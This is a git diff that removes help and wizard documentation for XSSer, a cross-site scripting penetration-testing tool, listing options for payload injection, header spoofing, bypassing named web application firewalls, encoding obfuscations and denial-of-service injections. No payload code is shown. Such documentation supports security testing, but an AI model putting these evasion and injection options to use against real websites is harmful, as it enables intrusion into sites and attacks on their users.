-  *Select type of HTTP/HTTPS Connection(s)*:
-    These options can be used to specify which parameter(s) we want to use
-    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
-    inject:
-
-    -g GETDATA          Send payload using GET (ex: '/menu.php?id=3&q=XSS')
-    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
-    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
-    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default 3)
-    --Cl                Crawl only local target(s) urls (default TRUE)
-
-  *Configure Request(s)*:
-    These options can be used to specify how to connect to the target(s)
-    payload(s). You can choose multiple:
-
-    --cookie=COOKIE     Change your HTTP Cookie header
-    --drop-cookie       Ignore Set-Cookie header from response
-    --user-agent=AGENT  Change your HTTP User-Agent header (default SPOOFED)
-    --referer=REFERER   Use another HTTP Referer header (default NONE)
-    --xforw             Set your HTTP X-Forwarded-For with random IP values
-    --xclient           Set your HTTP X-Client-IP with random IP values
-    --headers=HEADERS   Extra HTTP headers newline separated
-    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
-    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
-    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
-    --ignore-proxy      Ignore system default HTTP proxy
-    --timeout=TIMEOUT   Select your timeout (default 30)
-    --retries=RETRIES   Retries when the connection timeouts (default 1)
-    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)
-    --delay=DELAY       Delay in seconds between each HTTP request (default 0)
-    --tcp-nodelay       Use the TCP_NODELAY option
-    --follow-redirects  Follow server redirection responses (302)
-    --follow-limit=FLI  Set limit for redirection requests (default 50)
-
-  *Checker Systems*:
-    These options are useful to know if your target is using filters
-    against XSS attacks:
-
-    --hash              send a hash to check if target is repeating content
-    --heuristic         discover parameters filtered by using heuristics
-    --discode=DISCODE   set code on reply to discard an injection
-    --checkaturl=ALT    check reply using: alternative url -> Blind XSS
-    --checkmethod=ALTM  check reply using: GET or POST (default: GET)
-    --checkatdata=ALD   check reply using: alternative payload
-    --reverse-check     establish a reverse connection from target to XSSer to
-                        certify that is 100% vulnerable (recommended!)
-
-  *Select Vector(s)*:
-    These options can be used to specify injection(s) code. Important if
-    you don't want to inject a common XSS vector used by default. Choose
-    only one option:
-
-    --payload=SCRIPT    OWN  - Inject your own code
-    --auto              AUTO - Inject a list of vectors provided by XSSer
-
-  *Anti-antiXSS Firewall rules*:
-    These options can be used to try to bypass specific WAF/IDS products.
-    Choose only if required:
-
-    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
-    --Phpids0.7         PHPIDS (0.7) [ALL]
-    --Imperva           Imperva Incapsula [ALL]
-    --Webknight         WebKnight (4.1) [Chrome]
-    --F5bigip           F5 Big IP [Chrome + FF + Opera]
-    --Barracuda         Barracuda WAF [ALL]
-    --Modsec            Mod-Security [ALL]
-    --Quickdefense      QuickDefense [Chrome]
-
-  *Select Bypasser(s)*:
-    These options can be used to encode vector(s) and try to bypass
-    possible anti-XSS filters. They can be combined with other techniques:
-
-    --Str               Use method String.FromCharCode()
-    --Une               Use Unescape() function
-    --Mix               Mix String.FromCharCode() and Unescape()
-    --Dec               Use Decimal encoding
-    --Hex               Use Hexadecimal encoding
-    --Hes               Use Hexadecimal encoding with semicolons
-    --Dwo               Encode IP addresses with DWORD
-    --Doo               Encode IP addresses with Octal
-    --Cem=CEM           Set different 'Character Encoding Mutations'
-                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
-
-  *Special Technique(s)*:
-    These options can be used to inject code using different XSS
-    techniques. You can choose multiple:
-
-    --Coo               COO - Cross Site Scripting Cookie injection
-    --Xsa               XSA - Cross Site Agent Scripting
-    --Xsr               XSR - Cross Site Referer Scripting
-    --Dcp               DCP - Data Control Protocol injections
-    --Dom               DOM - Document Object Model injections
-    --Ind               IND - HTTP Response Splitting Induced code
-    --Anchor            ANC - Use Anchor Stealth payloader (DOM shadows!)
-
-  *Select Final injection(s)*:
-    These options can be used to specify the final code to inject on
-    vulnerable target(s). Important if you want to exploit 'on-the-wild'
-    the vulnerabilities found. Choose only one option:
-
-    --Fp=FINALPAYLOAD   OWN    - Exploit your own code
-    --Fr=FINALREMOTE    REMOTE - Exploit a script -remotely-
-    --Doss              DOSs   - XSS (server) Denial of Service
-    --Dos               DOS    - XSS (client) Denial of Service
-    --B64               B64    - Base64 code encoding in META tag (rfc2397)
-
-  *Special Final injection(s)*:
-    These options can be used to execute some 'special' injection(s) on
-    vulnerable target(s). You can select multiple and combine them with
-    your final code (except with DCP code):
-
-    --Onm               ONM - Use onMouseMove() event
-    --Ifr               IFR - Use <iframe> source tag
-
-  *Reporting*:
-    --save              export to file (XSSreport.raw)
-    --xml=FILEXML       export to XML (--xml file.xml)
-
-  *Miscellaneous*:
-    --silent            inhibit console output results
-    --no-head           NOT send a HEAD request before start a test
-    --alive=ISALIVE     set limit of errors before check if target is alive
-    --update            check for latest stable version
-
diff --git a/xsser/gtk/docs/wizard0.txt b/xsser/gtk/docs/wizard0.txt
deleted file mode 100644
index 37303f4..0000000
--- a/xsser/gtk/docs/wizard0.txt
+++ /dev/null
@@ -1,16 +0,0 @@
-         
-         
-          
-    ==========
-
-    Welcome to the Wizard Helper!
-
-
-    You only need to reply some questions to create your pentesting attack. If you haven't time to read, just press "Next". :-)
-
-    XSSer will take your answers to -automagically- build all the necessary commands.
-
-
-    Press "Start Wizard" button (below) to start your configuration...
-
-    ==========